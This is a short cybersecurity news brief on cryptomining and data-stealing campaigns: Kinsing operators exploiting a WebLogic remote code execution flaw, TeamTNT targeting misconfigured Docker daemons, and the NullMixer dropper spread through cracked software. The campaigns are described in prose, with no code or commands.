Threat actors have been targeting Oracle WebLogic Servers and Docker APIs to facilitate cryptomining malware deployment, according to The Hacker News.
Kinsing malware operators have been exploiting new and old WebLogic flaws to deactivate security features baked in the operating system, a report from Trend Micro revealed. Vulnerable WebLogic servers have been compromised through attacks leveraging a remote code execution bug, tracked as CVE-2020-14882, which has been previously exploited for Monero miner and Tsunami backdoor deployment.
"The successful exploitation of this vulnerability can lead to RCE, which can allow attackers to perform a plethora of malicious activities on affected systems. This can range from malware execution [...] to theft of critical data, and even complete control of a compromised machine," said Trend Micro.
Meanwhile, a separate report from Aqua Security shed light on three new attacks from the TeamTNT cryptojacking group, which ended operations last November.
"TeamTNT has been scanning for a misconfigured Docker Daemon and deploying alpine, a vanilla container image, with a command line to download a shell script (k.sh) to a C2 server," said Aqua Security researcher Assaf Morag, who added that the new attacks sought to break SECP256K1 encryption to compromise cryptocurrency wallets.
The Hacker News reports that threat actors have been using cracked software to distribute the new NullMixer malware dropper, which could simultaneously deploy various trojans to enable credential, address, cryptocurrency, credit card data, and Facebook and Amazon cookie exfiltration.